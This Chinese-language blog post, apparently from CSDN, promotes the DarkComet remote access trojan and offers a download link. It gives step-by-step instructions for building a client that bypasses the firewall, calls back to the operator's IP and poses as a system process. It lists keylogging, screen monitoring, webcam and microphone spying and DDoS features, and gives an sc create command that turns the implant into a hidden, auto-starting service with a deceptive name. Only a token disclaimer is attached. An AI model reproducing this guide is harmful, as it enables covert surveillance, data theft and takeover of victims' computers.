Darkcomet-RAT 远控

声明：本帖仅作技术交流，切莫用于非法用途。否则造成的一切法律责任与作者无关。

之前在Quasar-Rat远控_quasar远程控制-CSDN博客一文中向大家介绍了一种远控工具，许多人表示此远控可在进程管理器中结束任务，如今推荐一个新的远控工具：Darkcomet-RAT 远控。

DarkComet （暗黑彗星）是由 Jean-Pierre Lesueur（称为 DarkCoderSc）开发的远程访问木马（称为 RAT），在 2012 年初开始扩散，它用于许多有针对性的攻击，能够通过网络摄像头拍照，通过连接到 PC 的麦克风窃听对话，并获得对受感染机器的完全控制。该 RAT 还以其键盘记录和文件传输功能而闻名，因此，任何远程攻击者都可以将任何文件加载到受感染的机器上，甚至窃取管理员权限、计算机/用户名、语言/国家、操作系统信息、使用的内存、网络摄像头信息、文档等。它会禁用任务管理器、注册表编辑器和文件夹选项，修改注册表项以禁用 Windows 防火墙设置，此操作允许此恶意进程执行而不会被 Windows 防火墙检测到。别名有：Fynloski、Krademok、DarkKomet 等。

下载链接：https://github.com/zxo2004/DarkComet-RAT-5.3.1

注：上次分享的两个github在线加速链接已经失效，GitHub: Let’s build from here · GitHub

此链接为新的在线加速，将网址中的github.com替换为此链接中的域名即可。

（使用过程中可能会跳出警告，如下图，没有风险继续访问）

 一.  使用教程

进入目标文件夹，点击该文件夹下的 DarkComet.exe

通过该工具，创建远控客户端

选择绕过防火墙

填写自己的公网或内网IP，再点击右方ADD+

选择需要的选项，然后勾选，在启动选项中可以伪装为系统进程

注：选项不要勾选太多，容易导致程序无法运行。

构造程序

二.工具功能展示 

1.屏幕监控

2.文件管理

三.远程命令

四.键盘监听

因为涉及到个人隐私，所以控制摄像头，麦克风的功能暂时不展示

此工具还可以对控制目标机器发送ddos攻击，http,syn,ping等都可以进行（请勿用于非法用途）

 其他功能位于其控制中端

三.启动项更改（拓展延申）

 可以通过.bat文件将客户端在注册表中的启动项转换为服务（可以在任务管理器中隐藏启动项，并以系统权限运行，缺点是不能使用桌面控制）

代码如下：

sc create Service "服务名称(可以用一些较为迷惑的服务名称，以免被人为删除)“ binPath= "客户端文件路径"  start= auto

将此段代码保存至.bat文档中，并将此文件与客户端文件进行捆绑。

创建自解压程序的工具可以用:Bat_to_Exe

Bat转EXE工具——Bat To EXE Converter-CSDN博客

:)本人还没有使用过这个方式，成功与否可以自己去探索